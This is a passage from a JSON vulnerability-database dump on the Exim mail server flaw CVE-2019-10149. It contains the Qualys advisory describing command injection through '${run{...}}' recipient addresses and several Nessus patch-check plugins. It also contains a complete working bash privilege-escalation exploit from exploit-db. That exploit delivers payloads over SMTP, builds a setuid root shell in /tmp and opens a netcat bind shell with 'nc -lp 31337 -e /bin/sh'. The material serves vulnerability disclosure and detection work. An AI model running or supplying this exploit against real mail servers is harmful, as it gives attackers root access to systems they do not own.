reuse\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\n (where \"khazad.dum\" is one of Exim's relay_to_domains). Indeed, the\n \"verify = recipient\" ACL can only check the domain part of a remote\n address (the part that follows the @ sign), not the local part.\n\n------------------------------------------------------------------------\nDefault configuration\n------------------------------------------------------------------------\n\n[...]\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Exim's developers, Solar Designer, and the members of\ndistros@openwall.\n\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\nDEBUG vulnerabilities:\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\nhttps://seclists.org/bugtraq/1995/Feb/56\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\nhttp://www.cheswick.com/ches/papers/berferd.pdf\n\n\n========================================================================\nTimeline\n========================================================================\n\n2019-05-27: Advisory sent to security@exim.\n\n2019-05-28: Advisory sent to distros@openwall.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-06-07T10:20:24", "description": "", "published": "2019-06-05T00:00:00", "type": "exploitdb", "title": "Exim 4.87 &lt; 4.91 - (Local / Remote) Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T00:00:00", "id": "EDB-ID:46974", "href": "https://www.exploit-db.com/exploits/46974", "sourceData": "Qualys Security Advisory\r\n\r\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nLocal exploitation\r\nRemote exploitation\r\n- Non-default configurations\r\n- Default configuration\r\nAcknowledgments\r\nTimeline\r\n\r\n Boromir: \"What is this new devilry?\"\r\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\r\n -- The Lord of the Rings: The Fellowship of the Ring\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nDuring a code review of the latest changes in the Exim mail server\r\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\r\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\r\nRemote *Command* Execution, not Remote Code Execution: an attacker can\r\nexecute arbitrary commands with execv(), as root; no memory corruption\r\nor ROP (Return-Oriented Programming) is involved.\r\n\r\nThis vulnerability is exploitable instantly by a local attacker (and by\r\na remote attacker in certain non-default configurations). To remotely\r\nexploit this vulnerability in the default configuration, an attacker\r\nmust keep a connection to the vulnerable server open for 7 days (by\r\ntransmitting one byte every few minutes). However, because of the\r\nextreme complexity of Exim's code, we cannot guarantee that this\r\nexploitation method is unique; faster methods may exist.\r\n\r\nExim is vulnerable by default since version 4.87 (released on April 6,\r\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\r\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\r\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\r\n(released on February 10, 2019):\r\n\r\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\r\nhttps://bugs.exim.org/show_bug.cgi?id=2310\r\n\r\nbut was not identified as a security vulnerability, and most operating\r\nsystems are therefore affected. For example, we exploit an up-to-date\r\nDebian distribution (9.9) in this advisory.\r\n\r\n\r\n========================================================================\r\nLocal exploitation\r\n========================================================================\r\n\r\nThe vulnerable code is located in deliver_message():\r\n\r\n6122 #ifndef DISABLE_EVENT\r\n6123 if (process_recipients != RECIP_ACCEPT)\r\n6124 {\r\n6125 uschar * save_local = deliver_localpart;\r\n6126 const uschar * save_domain = deliver_domain;\r\n6127\r\n6128 deliver_localpart = expand_string(\r\n6129 string_sprintf(\"${local_part:%s}\", new->address));\r\n6130 deliver_domain = expand_string(\r\n6131 string_sprintf(\"${domain:%s}\", new->address));\r\n6132\r\n6133 (void) event_raise(event_action,\r\n6134 US\"msg:fail:internal\", new->message);\r\n6135\r\n6136 deliver_localpart = save_local;\r\n6137 deliver_domain = save_domain;\r\n6138 }\r\n6139 #endif\r\n\r\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\r\nexpansion item, and because new->address is the recipient of the mail\r\nthat is being delivered, a local attacker can simply send a mail to\r\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\r\nlocal_domains) and execute arbitrary commands, as root\r\n(deliver_drop_privilege is false, by default):\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nRemote exploitation\r\n========================================================================\r\n\r\nOur local-exploitation method does not work remotely, because the\r\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\r\nconfiguration requires the local part of the recipient's address (the\r\npart that precedes the @ sign) to be the name of a local user:\r\n\r\n[...]\r\n\r\n------------------------------------------------------------------------\r\nNon-default configurations\r\n------------------------------------------------------------------------\r\n\r\nWe eventually devised an elaborate method for exploiting Exim remotely\r\nin its default configuration, but we first identified various\r\nnon-default configurations that are easy to exploit remotely:\r\n\r\n- If the \"verify = recipient\" ACL was removed manually by an\r\n administrator (maybe to prevent username enumeration via RCPT TO),\r\n then our local-exploitation method also works remotely.\r\n\r\n- If Exim was configured to recognize tags in the local part of the\r\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\r\n then a remote attacker can simply reuse our local-exploitation method\r\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\r\n name of a local user).\r\n\r\n- If Exim was configured to relay mail to a remote domain, as a\r\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\r\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\r\n (where \"khazad.dum\" is one of Exim's relay_to_domains). Indeed, the\r\n \"verify = recipient\" ACL can only check the domain part of a remote\r\n address (the part that follows the @ sign), not the local part.\r\n\r\n------------------------------------------------------------------------\r\nDefault configuration\r\n------------------------------------------------------------------------\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Exim's developers, Solar Designer, and the members of\r\ndistros@openwall.\r\n\r\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\r\nDEBUG vulnerabilities:\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\r\nhttps://seclists.org/bugtraq/1995/Feb/56\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\r\nhttp://www.cheswick.com/ches/papers/berferd.pdf\r\n\r\n\r\n========================================================================\r\nTimeline\r\n========================================================================\r\n\r\n2019-05-27: Advisory sent to security@exim.\r\n\r\n2019-05-28: Advisory sent to distros@openwall.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46974"}, {"lastseen": "2019-06-17T14:21:48", "description": "", "published": "2019-06-17T00:00:00", "type": "exploitdb", "title": "Exim 4.87 - 4.91 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "EDB-ID:46996", "href": "https://www.exploit-db.com/exploits/46996", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n\techo \"$0 [-m METHOD]\"\r\n\techo\r\n\techo \"-m setuid : use the setuid payload (default)\"\r\n\techo \"-m netcat : use the netcat payload\"\r\n\techo\r\n\texit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n\t# connect to localhost:25\r\n\texec 3<>/dev/tcp/localhost/25\r\n\r\n\t# deliver the payload\r\n\tread -u 3 && echo $REPLY\r\n\techo \"helo localhost\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"mail from:<>\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"rcpt to:<$PAYLOAD>\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"data\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\tfor i in {1..31}\r\n\tdo\r\n\t\techo \"Received: $i\" >&3\r\n\tdone\r\n\techo \".\" >&3\r\n\tread -u 3 && echo $REPLY\r\n\techo \"quit\" >&3\r\n\tread -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! -z \"$1\" ]; do\r\n\tcase $1 in\r\n\t\t-m) shift; METHOD=\"$1\"; shift;;\r\n\t\t* ) usage\r\n\t\t;;\r\n\tesac\r\ndone\r\nif [ -z $METHOD ]; then\r\n\tusage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n\t# prepare a setuid shell helper to circumvent bash checks\r\n\techo \"Preparing setuid shell helper...\"\r\n\techo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n\tgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n\tif [ $? -ne 0 ]; then\r\n\t\techo \"Problems compiling setuid shell helper, check your gcc.\"\r\n\t\techo \"Falling back to the /bin/sh method.\"\r\n\t\tcp /bin/sh /tmp/pwned\r\n\tfi\r\n\techo\r\n\r\n\t# select and deliver the payload\r\n\techo \"Delivering $METHOD payload...\"\r\n\tPAYLOAD=$PAYLOAD_SETUID\r\n\texploit\r\n\techo\r\n\r\n\t# wait for the magic to happen and spawn our shell\r\n\techo \"Waiting 5 seconds...\"\r\n\tsleep 5\r\n\tls -l /tmp/pwned\r\n\t/tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n\t# select and deliver the payload\r\n\techo \"Delivering $METHOD payload...\"\r\n\tPAYLOAD=$PAYLOAD_NETCAT\r\n\texploit\r\n\techo\r\n\r\n\t# wait for the magic to happen and spawn our shell\r\n\techo \"Waiting 5 seconds...\"\r\n\tsleep 5\r\n\tnc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n\tusage\r\nfi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/46996"}], "nessus": [{"lastseen": "2021-02-09T20:55:28", "description": "exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim\n (bsc#1136587)", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-12T00:00:00", "title": "openSUSE Security Update : exim (openSUSE-2019-1524)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-12T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:exim-debugsource"], "id": "OPENSUSE-2019-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/125843", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1524.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125843);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2019-1524)\");\n script_summary(english:\"Check for the openSUSE-2019-1524 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim\n (bsc#1136587)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1136587\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-debuginfo-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"exim-debugsource-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximon-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximon-debuginfo-4.88-lp151.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"eximstats-html-4.88-lp151.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T00:06:41", "description": "It was discovered that Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Ubuntu 18.04 LTS / 18.10 : exim4 vulnerability (USN-4010-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light"], "id": "UBUNTU_USN-4010-1.NASL", "href": "https://www.tenable.com/plugins/nessus/125770", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4010-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125770);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"USN\", value:\"4010-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 18.10 : exim4 vulnerability (USN-4010-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4010-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2021 Canonical, Inc. / NASL script (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.90.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.90.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.91-6ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.91-6ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-09T17:25:53", "description": "A flaw was found in Exim versions 4.87 to 4.91 before release 1.20\n(inclusive). Improper validation of recipient address in\ndeliver_message() function in /src/deliver.c may lead to remote\ncommand execution. (CVE-2019-10149)", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Amazon Linux AMI : exim (ALAS-2019-1221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/125739", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1221.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125739);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"ALAS\", value:\"2019-1221\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2019-1221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in Exim versions 4.87 to 4.91 before release 1.20\n(inclusive). Improper validation of recipient address in\ndeliver_message() function in /src/deliver.c may lead to remote\ncommand execution. (CVE-2019-10149)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1221.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate 